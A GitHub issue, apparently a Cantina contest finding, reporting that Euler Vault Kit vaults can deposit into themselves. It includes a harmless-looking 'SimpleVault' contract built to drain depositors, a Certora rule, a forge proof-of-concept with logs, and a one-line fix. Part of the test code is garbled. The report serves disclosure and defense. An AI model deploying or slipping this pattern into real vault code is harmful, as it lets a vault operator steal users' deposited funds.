zapaz / euler-vault-cantina-fv

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EVK Vault module can deposit to itself allowing to drain all the Assets #1

Open zapaz opened 3 months ago

zapaz commented 3 months ago

link to cantina issue =>

Relevant Context

A seemingly harmless SimpleVault inheriting from the EVK can drain all the Assets of the Vault.

Finding Description

The EVK VaultModule can deposit into itself, causing an internal inconsistency between the actual Vault balance and totalAssets(). (more precisely between asset.balanceOf(address(vault)) and vault.totalAssets()), even without using any borrowing functionnality.

SimpleVault, a contract inheriting from EVault, that appears completely harmless on its own, can exploit this inconsistency by calling VaultModule code to drain all the Assets of the Vault.

SimpleVault code:

```solidity // SPDX-License-Identifier: GPL-2.0-or-later pragma solidity ^0.8.0; import {EVault} from "src/EVault/EVault.sol"; import {IEVault} from "src/EVault/IEVault.sol"; import {Base} from "src/EVault/shared/Base.sol"; interface ISimpleVaultBase { function stake(uint256, address) external returns (uint256); function unstake(uint256, address, address) external returns (uint256); } interface ISimpleVault is IEVault, ISimpleVaultBase {} contract SimpleVault is ISimpleVaultBase, EVault { constructor(Integrations memory integrations, DeployedModules memory modules) EVault(integrations, modules) {} /// Define aliases for 2 main Vault functions // stake == deposit function stake(uint256 amount, address receiver) external returns (uint256) { return this.deposit(amount, receiver); } // unstake == withdraw function unstake(uint256 amount, address receiver, address owner) external returns (uint256) { return this.withdraw(amount, receiver, owner); } } ```

The hack here is to call this.deposit and this.withdraw instead of deposit and withdraw to enable the Vault to be the actual caller. So depositing into itself, implying it's own balance unchanged (due to a transfer of Assets to itsef, sort of transfer(from, to) with to == from)

So anyone can call stake with totalAssets() amount, and then call unstake with the same amount, draining all the Assets of the Vault in 2 transactions.

Impact Explanation

EVK is unsecure, and can't be used as is as a Kit. If anyone promote a Vault like SimpleVault or any other form of EVK derivated Vault, inheriting from EVault, extanding it with new modules or modifying existing EVK code, can exploit this weakness and steal all users funds deposited in the Vault, event if the Vault is permissionless.

Main concern here is that SimpleVault seems harmless, but use one invisible EVK weakness.

Likelihood Explanation

As soon as this type of derivated Vault from EVK is deployed, it can be exploited.

The likelihood is high, as the code is public and the exploit is easy to understand and implement.

The only hurdle is to promote this malicious Vault, without audits (saying "it's only 2 lines of code added..."), to attract users and encourange them to deposit funds in it.

Impact is that all sort of Vault like SimpleVault derivated from the EVK can drain all the assets in 2 transactions.

Proof of Concept

Weakness has been found via a Certora rule.

Certora rule detecting the issue

```solidity // Shares are returned only and only if balance of actual caller strictly decrease rule depositShares(env e, calldataarg args) { address caller = actualCaller(e); mathint _balanceCaller = userAssets(e, caller); uint256 shares = deposit(e, args); mathint balanceCaller_ = userAssets(e, caller); assert shares > 0 <=> balanceCaller_ < _balanceCaller; } ```

This rule has counter examples only when actualCaller == vault, i.e. shares > 0 without balance change

Here is a POC with a forge test, including traces and asserts:

DepositSelfHack POC contract - File test/contest/DepositSelfHack.sol:

```solidity // SPDX-License-Identifier: GPL-2.0-or-later pragma solidity ^0.8.0; import {SimpleVaultTest} from "./SimpleVault.t.sol"; import {ISimpleVault} from "src/EVault/SimpleVault.sol"; import {console2} from "forge-std/Test.sol"; contract DepositSelfHack is SimpleVaultTest { uint256 one = 1e18; address user = makeAddr("user"); address hacker = makeAddr("hacker"); function _log(string memory label) public view { console2.log(label, "| User Balance :", assetTST.balanceOf(user)); console2.log(label, "| Vault Balance :", assetTST.balanceOf(address(eTST))); console2.log(label, "| Total Assets :", eTST.totalAssets()); console2.log(label, "| Hacker Balance :", assetTST.balanceOf(hacker)); console2.log("------------------------|-------------------------------------"); } function test_depositSelfHack() public {, one); _log(" User Mint 1"); hoax(user); assetTST.approve(address(eTST), one); assert(assetTST.balanceOf(address(eTST)) == 0); assert(assetTST.balanceOf(user) == one); assert(assetTST.balanceOf(hacker) == 0); hoax(user); eTST.deposit(one, user); _log(" User Deposit 1"); ISimpleVault(address(eTST)).stake(one, address(eTST)); _log("Buggy Vault Deposit 1"); ISimpleVault(address(eTST)).unstake(one, hacker, address(eTST)); _log("Hacker Vault Steal 1"); assert(assetTST.balanceOf(address(eTST)) == 0); assert(assetTST.balanceOf(user) == 0); assert(assetTST.balanceOf(hacker) == one); } } ```

SimpleVault Test Setup - File test/contest/SimpleVaultTest.sol:

```solidity // SPDX-License-Identifier: GPL-2.0-or-later pragma solidity ^0.8.13; import {Test, console2, stdError} from "forge-std/Test.sol"; import {DeployPermit2} from "permit2/test/utils/DeployPermit2.sol"; import {GenericFactory} from "src/GenericFactory/GenericFactory.sol"; import {ProtocolConfig} from "src/ProtocolConfig/ProtocolConfig.sol"; import {Dispatch} from "src/EVault/Dispatch.sol"; import {Initialize} from "src/EVault/modules/Initialize.sol"; import {Token} from "src/EVault/modules/Token.sol"; import {Vault} from "src/EVault/modules/Vault.sol"; import {Borrowing} from "src/EVault/modules/Borrowing.sol"; import {Liquidation} from "src/EVault/modules/Liquidation.sol"; import {BalanceForwarder} from "src/EVault/modules/BalanceForwarder.sol"; import {Governance} from "src/EVault/modules/Governance.sol"; import {RiskManager} from "src/EVault/modules/RiskManager.sol"; // import {EVault} from "src/EVault/EVault.sol"; // import {ISimpleVault, IERC20} from "src/EVault/ISimpleVault.sol"; import {SimpleVault, ISimpleVault} from "src/EVault/SimpleVault.sol"; import {TypesLib} from "src/EVault/shared/types/Types.sol"; import {Base} from "src/EVault/shared/Base.sol"; import {EthereumVaultConnector} from "ethereum-vault-connector/EthereumVaultConnector.sol"; import {TestERC20} from "test/mocks/TestERC20.sol"; import {MockBalanceTracker} from "test/mocks/MockBalanceTracker.sol"; import {MockPriceOracle} from "test/mocks/MockPriceOracle.sol"; import {IRMTestDefault} from "test/mocks/IRMTestDefault.sol"; import {IHookTarget} from "src/interfaces/IHookTarget.sol"; import {SequenceRegistry} from "src/SequenceRegistry/SequenceRegistry.sol"; import {AssertionsCustomTypes} from "test/helpers/AssertionsCustomTypes.sol"; import "src/EVault/shared/Constants.sol"; contract SimpleVaultTest is AssertionsCustomTypes, Test, DeployPermit2 { EthereumVaultConnector public evc; address admin; address feeReceiver; address protocolFeeReceiver; ProtocolConfig protocolConfig; address balanceTracker; MockPriceOracle oracle; address unitOfAccount; address permit2; address sequenceRegistry; GenericFactory public factory; TestERC20 assetTST; ISimpleVault public eTST; address initializeModule; address tokenModule; address vaultModule; address borrowingModule; address liquidationModule; address riskManagerModule; address balanceForwarderModule; address governanceModule; Base.Integrations integrations; Dispatch.DeployedModules modules; function setUp() public virtual { admin = vm.addr(1000); feeReceiver = makeAddr("feeReceiver"); protocolFeeReceiver = makeAddr("protocolFeeReceiver"); factory = new GenericFactory(admin); evc = new EthereumVaultConnector(); protocolConfig = new ProtocolConfig(admin, protocolFeeReceiver); balanceTracker = address(new MockBalanceTracker()); oracle = new MockPriceOracle(); unitOfAccount = address(1); permit2 = deployPermit2(); sequenceRegistry = address(new SequenceRegistry()); integrations = Base.Integrations(address(evc), address(protocolConfig), sequenceRegistry, balanceTracker, permit2); initializeModule = address(new Initialize(integrations)); tokenModule = address(new Token(integrations)); vaultModule = address(new Vault(integrations)); borrowingModule = address(new Borrowing(integrations)); liquidationModule = address(new Liquidation(integrations)); riskManagerModule = address(new RiskManager(integrations)); balanceForwarderModule = address(new BalanceForwarder(integrations)); governanceModule = address(new Governance(integrations)); modules = Dispatch.DeployedModules({ initialize: initializeModule, token: tokenModule, vault: vaultModule, borrowing: borrowingModule, liquidation: liquidationModule, riskManager: riskManagerModule, balanceForwarder: balanceForwarderModule, governance: governanceModule }); address evaultImpl = address(new SimpleVault(integrations, modules)); vm.prank(admin); factory.setImplementation(evaultImpl); assetTST = new TestERC20("Test Token", "TST", 18, false); eTST = ISimpleVault( factory.createProxy(address(0), true, abi.encodePacked(address(assetTST), address(oracle), unitOfAccount)) ); eTST.setInterestRateModel(address(new IRMTestDefault())); eTST.setMaxLiquidationDiscount(0.2e4); eTST.setFeeReceiver(feeReceiver); } address internal SYNTH_VAULT_HOOK_TARGET = address(new MockHook()); uint32 internal constant SYNTH_VAULT_HOOKED_OPS = OP_DEPOSIT | OP_MINT | OP_REDEEM | OP_SKIM | OP_REPAY_WITH_SHARES; function createSynthEVault(address asset) internal returns (ISimpleVault) { ISimpleVault v = ISimpleVault( factory.createProxy(address(0), true, abi.encodePacked(address(asset), address(oracle), unitOfAccount)) ); v.setInterestRateModel(address(new IRMTestDefault())); v.setInterestFee(1e4); v.setHookConfig(SYNTH_VAULT_HOOK_TARGET, SYNTH_VAULT_HOOKED_OPS); return v; } function getSubAccount(address primary, uint8 subAccountId) internal pure returns (address) { require(subAccountId <= 256, "invalid subAccountId"); return address(uint160(uint160(primary) ^ subAccountId)); } } contract MockHook is IHookTarget { error E_OnlyAssetCanDeposit(); error E_OperationDisabled(); function isHookTarget() external pure override returns (bytes4) { return this.isHookTarget.selector; } // deposit is only allowed for the asset function deposit(uint256, address) external view { address asset = ISimpleVault(msg.sender).asset(); // these calls are just to test if there's no RO-reentrancy for the hook target ISimpleVault(msg.sender).totalBorrows(); ISimpleVault(msg.sender).balanceOf(address(this)); if (asset != caller()) revert E_OnlyAssetCanDeposit(); } // all the other hooked ops are disabled fallback() external { revert E_OperationDisabled(); } function caller() internal pure returns (address _caller) { assembly { _caller := shr(96, calldataload(sub(calldatasize(), 20))) } } } ```

forge test --mt depositSelfHack -vv produces this output:

``` » forge test --mt depositSelfHack -vv [⠒] Compiling... No files changed, compilation skipped Ran 1 test for test/contest/DepositSelfHack.t.sol:SimpleVault_DepositSelfHack [PASS] test_depositSelfHack() (gas: 379373) Logs: User Mint 1 | User Balance : 1000000000000000000 User Mint 1 | Vault Balance : 0 User Mint 1 | Total Assets : 0 User Mint 1 | Hacker Balance : 0 ------------------------|------------------------------------- User Deposit 1 | User Balance : 0 User Deposit 1 | Vault Balance : 1000000000000000000 User Deposit 1 | Total Assets : 1000000000000000000 User Deposit 1 | Hacker Balance : 0 ------------------------|------------------------------------- Buggy Vault Deposit 1 | User Balance : 0 Buggy Vault Deposit 1 | Vault Balance : 1000000000000000000 Buggy Vault Deposit 1 | Total Assets : 2000000000000000000 Buggy Vault Deposit 1 | Hacker Balance : 0 ------------------------|------------------------------------- Hacker Vault Steal 1 | User Balance : 0 Hacker Vault Steal 1 | Vault Balance : 0 Hacker Vault Steal 1 | Total Assets : 1000000000000000000 Hacker Vault Steal 1 | Hacker Balance : 1000000000000000000 ------------------------|------------------------------------- Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.88ms (1.05ms CPU time) Ran 1 test suite in 154.01ms (4.88ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ```


To prevent this weakness, add a one line check to prevent the Vault from depositing to itself.

Vault.sol deposit function - Lines 123-128 of File src/EVault/modules/Vault.sol:

```diff /// @inheritdoc IERC4626 function deposit(uint256 amount, address receiver) public virtual nonReentrant returns (uint256) { (VaultCache memory vaultCache, address account) = initOperation(OP_DEPOSIT, CHECKACCOUNT_NONE); + require(account != address(this), "Vault: cannot deposit to self"); Assets assets = amount == type(uint256).max ? vaultCache.asset.balanceOf(account).toAssets() : amount.toAssets(); if (assets.isZero()) return 0; ```
teryanarmen commented 2 months ago

I believe the bug was found invalid.

zapaz commented 2 months ago

I believe the bug was found invalid.

they said it's fully valid, but considered it out of scope... until they got hacked this way ;-(

zapaz commented 2 months ago
Capture d’écran 2024-06-25 à 10 00 51
teryanarmen commented 2 months ago

Can you please add hoytech and erik1o6 from euler as collaborators?

teryanarmen commented 2 months ago

If there's a limit on how many collaborators you can add, you can make this public, since the contest is over.

zapaz commented 2 months ago

Can you please add hoytech and erik1o6 from euler as collaborators?


zapaz commented 2 months ago

If there's a limit on how many collaborators you can add, you can make this public, since the contest is over.

done also :-)